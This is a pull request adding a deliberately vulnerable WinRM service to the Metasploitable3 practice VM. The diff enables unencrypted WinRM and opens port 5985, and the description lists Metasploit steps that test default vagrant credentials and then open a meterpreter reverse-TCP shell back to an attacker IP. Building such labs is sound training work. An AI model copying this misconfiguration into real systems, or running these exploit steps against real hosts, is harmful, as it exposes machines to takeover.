### PR TITLE
Add WinRM service to Metasploitable3

### DIFF
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -36,6 +36,10 @@ Vagrant.configure("2") do |config|
   config.vm.provision :shell, path: "resources/iis/setup_iis.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
 
+  # Vulnerability - WinRM
+  config.vm.provision :shell, path: "resources/winrm/setup_winrm.bat"
+  config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
+
   # Vulnerability - Setup for Apache Struts
   config.vm.provision :shell, path: "scripts/chocolatey_installs/java.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614

--- a/resources/winrm/setup_winrm.bat
+++ b/resources/winrm/setup_winrm.bat
@@ -1,0 +1,2 @@
+winrm quickconfig
+winrm set winrm/config/service @{AllowUnencrypted="true"}

--- a/scripts/configure_firewall.bat
+++ b/scripts/configure_firewall.bat
@@ -1,2 +1,3 @@
+netsh advfirewall firewall add rule name="Open Port 5985 for WinRM" dir=in action=allow protocol=TCP localport=5985
 netsh advfirewall firewall add rule name="Open Port 8080 for Apache Struts" dir=in action=allow protocol=TCP localport=8080
 netsh advfirewall firewall add rule name="Open Port 80 for IIS" dir=in action=allow protocol=TCP localport=80


### PR DESCRIPTION
This adds WinRM to Metasploitable3

Verification
- [ ] Install packer with `brew install packer`
- [ ] Install packer with `brew install packer`
- [ ] Install Vagrant with `brew install vagrant`
- [ ] Install Virtualbox
- [ ] Clone this repo and check out this branch
- [ ] Build the base VM using `packer build windows_2008_r2.json`
- [ ] Add the resulting .box file to vagrant using `vagrant box add windows_2008_r2_virtualbox.box --name metasploitable3`
- [ ] Bring up the vagrant environment using the command `vagrant up`
- [ ] You should see that port 5985 is open
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/winrm/winrm_login`
- [ ] Do: `set rhosts [metasploitable3 IP]`
- [ ] Do: `set username vagrant`
- [ ] Do: `set password vagrant`
- [ ] Do: `run`
- [ ] You should get a credential
- [ ] Do: `use exploit/windows/winrm/winrm_script_exec`
- [ ] Do: `set rhost [metasploitable3 IP]`
- [ ] Do: `set username vagrant`
- [ ] Do: `set password vagrant`
- [ ] Do: `set payload windows/meterpreter/reverse_tcp`
- [ ] Do: `set lhost [attacker IP]`
- [ ] Do: `exploit`
- [ ] You should get a session
